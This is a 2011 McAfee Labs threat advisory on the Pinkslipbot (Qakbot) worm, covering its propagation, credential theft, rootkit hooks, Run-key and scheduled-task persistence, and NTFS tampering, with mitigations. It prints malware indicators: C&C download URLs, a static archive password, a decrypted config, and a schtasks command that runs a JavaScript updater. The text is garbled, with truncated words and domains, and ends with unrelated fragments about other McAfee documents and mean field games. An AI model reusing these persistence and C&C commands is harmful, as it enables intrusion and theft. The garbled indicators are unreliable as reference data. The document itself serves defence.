McAfee Labs Threat Advisory W32/Pinkslipbot
McAfee Labs Threat AdvisoryW32/PinkslipbotMay 26, 2011SummaryThe W32/Pinkslipbot worm is capable of spreading over network shares, downloading files, and updating itssoftware. Additionally it is capable of receiving back door command from its IRC command and controlcenter. It attempts to steal user information and upload it to FTP sites.Aliases: Qakbot Akbot QbotDetailed information about the worm, its propagation, and mitigation are in the following sections: Infection and Propagation VectorsPrevalence InformationCharacteristics and SymptomsRootkit BehaviorRestart MechanismNTFS Folder Permission AlterationGetting Help from the McAfee Foundstone Services teamInfection and Propagation VectorsThere are two infection and propagation vectors that Pinkslipbot primarily uses to spread itself. Below are thedescription and mitigation for each one.ExploitsMany Pinkslipbot infections had been reported to be propagated by exploiting web related vulnerabilities.Known vulnerabilities used to propagate this threat include:oooooVulnerability in the Microsoft Data Access Components (MDAC) Functiono http://support.microsoft.com/kb/870669o /MS06-014.mspxApple Quicktime RTSP URL Handler Stack-based Buffer Overflowo http://cve.mitre.org/cgi-bin/cvename.cgi?name CVE-2007-4673o http://cve.mitre.org/cgi-bin/cvename.cgi?name CVE-2007-0015Adobe getIcon Stack-based buffer overflowo http://cve.mitre.org/cgi-bin/cvename.cgi?name CVE-2009-0927MsVidCtl Overflow in Microsoft Video ActiveX Controlo http://cve.mitre.org/cgi-bin/cvename.cgi?name 2008-0015Adobe Reader and Acrobat CoolType.dll Font Parsing Buffer Overflow Vulnerabilityo http://cve.mitre.org/cgi-bin/cvename.cgi?name CVE-2010-2883MitigationIt is recommended that all computer systems are updated with the latest vendor patches, not limited to thevulnerabilities mentioned above.In addition, restriction of scripting and browser plugins for document files and media players can also furthermitigate risks of malware bypassing certain browser security.
Network SharesPinkslipbot is known to spread over open shares such as C and ADMIN . If an open network share is found,Pinkslipbot related files are copied over to the share and executed remotely.MitigationooEnforce a strict password policy on all network shares and allow write permissions to only trustedaccounts that need it.Though this may not apply to all Pinkslipbot variants, it is recommended to turn off Autorunfunctionality (http://support.microsoft.com/kb/967715).USB and Removable DrivesPinkslipbot can also spread over removable drives. Once the machine is infected, it will monitor for anattached drive. If found it will create a copy of itself with the same filename of any directory on the drive.Mitigation:oooDisable the Autorun feature on Windows. You can do this remotely using Windows Group Policies.Restrict the use of USB drives in mission-critical and server machines.Implement and test Access Protection Rules using VirusScan Enterprise to prevent writing ofAUTORUN.INF files.Prevalence InformationFollowing graph captures the prevalence information seen in field for W32/Pinkslipbot infections. This data iscaptured from the McAfee Virus Map. The graph shows the daily distribution unique IP addresses reportinginfections for this threat in May 2011:A quick view at distribution of these infections across countries concludes that W32/Pinkslipbot threat isprimarily dominant in US:
A Google map view (North America) for reported infections on Pinkslipbot in May 2011 is presented below:W32/Pinkslipbot is known to evolve continuously. McAfee has seen many unique variants of this malware in2011. Following graph captures week wise distribution of unique variants seen till date in 2011:Characteristics and SymptomsDescriptionAn executable is downloaded as a result of an initial infection. The exe contains an encrypted DLL andconfiguration file which are dropped and utilized for initialization and injection. The DLL file is loaded into theexe’s process memory. It sets up hooks (Rootkit Behavior section) in multiple processes for data gatheringand information stealing purposes. Pinkslipbot also injects its DLL code into some processes such as:
msmsgs.exeThe injected code then attempts to reach out to the Internet to gather other configuration files and updates.In older variants, configuration information was available via a password protected ZIP archive with a staticpassword "Hello999W0rld777".The Exe, DLL and other configuration files are typically stored under a randomly named sub folder within thefollowing folder:o%AllUsersProfile%\Application Data\Microsoft\The configuration file is encrypted. On decryption it contains C&C and FTP Server information. The followingis an example of such a decrypted configuration file:cc server port 16768cc server pass Ijadsnanunx56512p2p node lst http://bckp01.in/cgi-bin/ls1.plftphost 1 ftphost 2 st 3 ftphost 4 ost 5 pdate conf ver 908Once installed, a user mode rootkit hides these files from GUI-based applications. A cmd.exe listing however,would allow one to list the files.Some of the filenames observed on an infected system botinj.exeq2l.exeq1.dllStart Menu\Programs\Startup\startup.batsi.txtFile names containing " irc"nbl *.txtremoveme.txtalias qa.zip* *.kcbalias qbotnti.exealias si.txtalias qbot.cbresume.docsconnect.jsalias seclog.txtupdates.cbupdates *new.cbinstalleduninstall.tmpqbot.cbqbot.cb
oo[random].jobMpr.dllThe malware has key logging, password stealing abilities, certificate stealing, and attempts to collectgeographic, OS, IP, e-mail addresses, URLs visited, and other system information. Such information is sentto compromised FTP hosts as shown below.As seen above, the malware uploads the stolen information in the file names seclog*.kcb andps dump.Administrator *.kcb, with the latter one containing the stolen password information.Network connections may be made on the following network ports:o 80o 21o 31666o 16666-16669Network connections are known to be made to the following 2121cdsfdfd.comup02.co.inup03.inup003.com.ua
.inlaststat.co.inbckp01.inIn addition, it can also monitor traffic to URLs that contain the ca.combusinessaccess.citibank.citigroup.com
nsonline.com/corpach/During our investigation of multiple variants of this threat, we observed following variations in the HTTPPOST request and URLs sent to the C&C server.ooooooooooooooohttp:// domain-name /cgi-bin/jl/jloader.pl?r q/qa.bin&n bthes7664&it 3&b 18http:// domain-name /cgi-bin/jl/jloader.pl?r q/qa.bin&n jpwel2451&it 2&b 6http:// domain-name /cgi-bin/jl/jloader.pl?u u/updates usoqc8673.cbhttp:// domain-name /cgi-bin/jl/jloader.pl?u u/updates.cbhttp:// domain-name /cgi-bin/jl/jloader.pl?u u/updates usoqc8673.cbhttp:// domain-name /cgi-bin/jl/jloader.pl?r q/we.js?u usoqc8673&v piuv8http:// domain-name /cgi-bin/jl/jloader.pl?r q/qa.zip&uninstall ppozu1276http:// domain-name /cgi-bin/jl/jloader.pl?r q/qa.bin&n zzekr1617&it 2&b 197//u/updates.cbhttp:// domain-name /cgi-bin/jl/jloader.pl?loadfile q/q2 force exec successhttp:// domain-name /cgi-bin/jl/jloader.pl?loadfile q/q2 irc nickhttp:// domain-name /cgi-bin/clientinfo3.pl?cookie socks-1-1580-zevhd0018http:// domain-name /cgi-bin/clientinfo3.pl?cookie bin/clientinfo3.pl?cookie n/clientinfo3.pl?cookie om/cgi-bin/clientinfo3.pl?cookie sysinfo-43-2716-fzrmj8460Note: domain-name vary based on the active C&C server.Pinkslipbot attempts to steal the following information from infected hosts:ooooPOP3, IMAP, NNTP, Email, SMTP PasswordsKeystrokesDigital CertificatesHTTP Session informationSome newer samples were observed to have valid stolen digital signatures.MitigationooooWhere possible, configure the perimeter and/or desktop firewall to restrict connections to thereported network ports, URLs and domain names.Users who have been known to be infected should change their passwords.Always ensure you have the latest DATs installed for McAfee Virus Scan Product. The latest DAT atthe time this document was updated is DAT 6354.For customers with McAfee Network Security Platform (NSP) product we recommend to enable the
following attacks.o To detect the vulnerabilities being exploited by W32/Pinkslipbot: 0x40231a00 - HTTP: Apple QuickTime RTSP URL Buffer Overflow 0x4021dd00 - HTTP: Microsoft Internet Explorer ADODB.Stream Object FileInstallationo To detect W32/Pinkslipbot infected victims on the network: 0x48804e00 - BOT: Quakbot (PinkSlip) Traffic DetectedRootkit BehaviorSome variants of this malware have also been known to install a rootkit component to hide its presence,including its running process and registry entries. In such cases, the malware will be hidden from normalprocess viewers and registry editors such as Task Manager and regedit.exe. The following are system APIsthat are hooked to accomplish eAws2 32.dll!connectws2 32.dll!sendws2 32.dll!WSASendws2 inet.dll!HttpOpenRequestWdnsapi.dll!DnsQuery Adnsapi.dll!DnsQuery WAt the time of research, some existing executables that it prevents hooking are:o msdev.exeo dbgview.exeo mirc.exeo ollydbg.exeo ctfmon.exePinkslipbot prevents user DNS queries to resolve when connecting to sites containing the following ywindowsupd
otkitsecurecomputingsophosspamhausRestart MechanismDescriptionPinkslipbot executables accept the following parameters:/i – Drops a DLL and a configuration file/s – if passed with the configuration file, runs Pinkslipbot in service mode/t – terminate/c – if passed with a executable name, it would run the executable.As a restart mechanism, Pinkslipbot will attempt to modify an existing “Run” registry key to include its ownEXE and DLL. The original executable pointed to by the “Run” key will be included in its “Run” Path andlaunched with a "/c" switch.As an example, it will modify an existing Run key such as:HKEY LOCAL Run[Original] [Path to Original]to:HKEY LOCAL Run[Original] random .exe random .dll /c [Path to Original]In newer variants, the Run key may be modified to:HKEY LOCAL Run[Original] random .exe /s Pinkslipbot config file Pinkslipbot uses a second restart mechanism. It saves a JavaScript (JS) file in the Windows System32 folder.The name of this file is typically sconnect.js. Newer variants have random named JS files.A Windows Task Scheduler job is then created which launches this JS script. This job is scheduled to runhourly. The JS file is also crafted to connect to malicious sites to download an update to the Pinkslipbotcomponents. The following is the task setup:o%windir%\system32\schtasks.exe" /create /tn [TaskName] /tr "%windir%\system32\cscript.exe//E:javascript [JavaScript File]" /sc HOURLY /mo 4 /ruMitigationooCreate and test a VirusScan Access Protection Rule (APR) to prevent cscript.exe and wscript.exeprocesses from reading and executing files from the %UserProfile% folder, where feasible.Create and test a VirusScan Access Protection Rule (APR) for “updates *new.cb”, “upd *.cb” and“updates* new.cb”. These are usually used as Pinkslipbot configuration files. Blocking these files canprevent the malware from updating.NTFS Folder Permission AlterationAround December 2010, new variants of Pinkslipbot were observed to be modifying NTFS permissions forfolders where security products are installed. This modification is possible only when Pinkslipbot is allowed toinfect when the user is logged in with Administrator privileges.When successful, NTFS permissions for security related folders are removed, such as access is preventedfrom administrators and system processes. Effectively, security products will not be allowed by the Windows
Operating System to run without the appropriate permissions.For example, the following McAfee folders are targeted:oo%AllUsersProfile%\Application Data\McAfee%ProgramFiles%\McAfeeDue to this change, files running from these locations will have permissions denied by the WindowsOperating System. In some cases there have been reports that PinkslipBot has been disabling permissionsfrom the %ProgramFiles% folder. In such cases many common user applications would be impacted.MitigationUsers should not be logged in with administrative privileges for daily use, except to perform specificadministrator tasks. This helps deny the malware from altering folder and system permissions.RemediationoA custom Stinger tool is provided by McAfee Labs upon request to restore modified NTFSpermissions. You must run the Stinger tool with a user account with Administrator privileges. It willrestore the original NTFS permissions to allow McAfee programs to be loaded.oAs an alternative, manual instructions to restore the folder’s permissions are as follows:1. Open Windows Explorer as Administrator and right-click the icon for the affected folder(s).2. Click into “Properties” to access the folder properties.3. Under the “Security” tab, click “Advanced”, then “Owner”.4. Choose the Administrator as Owner (or some user with Administrator privilege).5. Click OK when prompted to apply changes.6. Return to the Security tab under “Properties” again.7. Click “Advanced”, and select “Inherit from parent the permissions entries that apply to childobjects”.8. Click OK when prompted to apply changes.oReboot the infected machine to restart all critical services.Getting Help from the McAfee Foundstone Services teamThis document is intended to provide a summary of current intelligence and best practices to ensure thehighest level of protection from your McAfee security solution. The McAfee Foundstone Services team offers afull range of strategic and technical consulting services that can further help to ensure you identify securityrisk and build effective solutions to remediate security vulnerabilities.You can reach them here: ontact.aspx 2011 McAfee, Inc. All rights reserved.
McAfee Labs Threat Advisory W32/Pinkslipbot May 26, 2011 Summary The W32/Pinkslipbot worm is capable of spreading
McAfee Management of Native Encryption (MNE) 4.1.1 McAfee Policy Auditor 6.2.2 McAfee Risk Advisor 2.7.2 McAfee Rogue System Detection (RSD) 5.0.4 and 5.0.5 McAfee SiteAdvisor Enterprise 3.5.5 McAfee Virtual Technician 8.1.0 McAfee VirusScan Enterprise 8.8 Patch 8 and Patch 9 McA
4 From McAfee.com, copy the McAfee ePO software to the virtual McAfee ePO server. 5 From the McAfee ePO server, run the setup utility. 6 Using a remote browser, log on to McAfee
McAfee Firewall Enterprise Control Center Release Notes, version 5.3.1 McAfee Firewall Enterprise Control Center Product Guide, version 5.3.1 McAfee Firewall Enterprise McAfee Firewall Enterprise on CloudShield Installation Guide, version 8.3.0 McAfee Network Integrity Agent Product Guide, version 1.0.0.0
Operation Sharpshooter The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group, employing McAfee Global Threat Intelligence, have discovered a new global campaign targeting nuclear, defense, energy, and financial companies. This campaign, Operation Sharpshooter,
McAfee ePolicy Orchestrator web API Scripting Guide McAfee ePolicy Orchestrator Log File Reference Guide These guides are available from the McAfee Support Website. Preface About this guide 8 McAfee ePolicy
the McAfee Firewall Admin Console client software, the hardware or virtual platform for running the firewall software. Configuration B. comprises: the McAfee Firewall Enterprise software, including its SecureOS operating system, the McAfee Firewal
McAfee, Inc. McAfee Firewall Enterprise 4150E Hardware Part Number: NSA-4150-FWEX-E Firmware Versions: 7.0.1.03 and 8.2.0 FIPS 140-2 Non-Proprietary Security Policy FIPS Security Level: 2 Document Version: 0.6 Prepared for: Prepared by: McAfee, Inc. Corsec Security, Inc. 282
Wei Yang Introduction to Mean field games and applications. Introduction Our results and applications Mean field game Methodology consider an N-playerstochastic dynamic game study amean field game(a limit for N !1) which can be expressed bya system of coupled equations: Fokker-Planck equation Hamilton-Jacobi-Bellman equation any solution to the mean field game is an -equilibriumto the N .
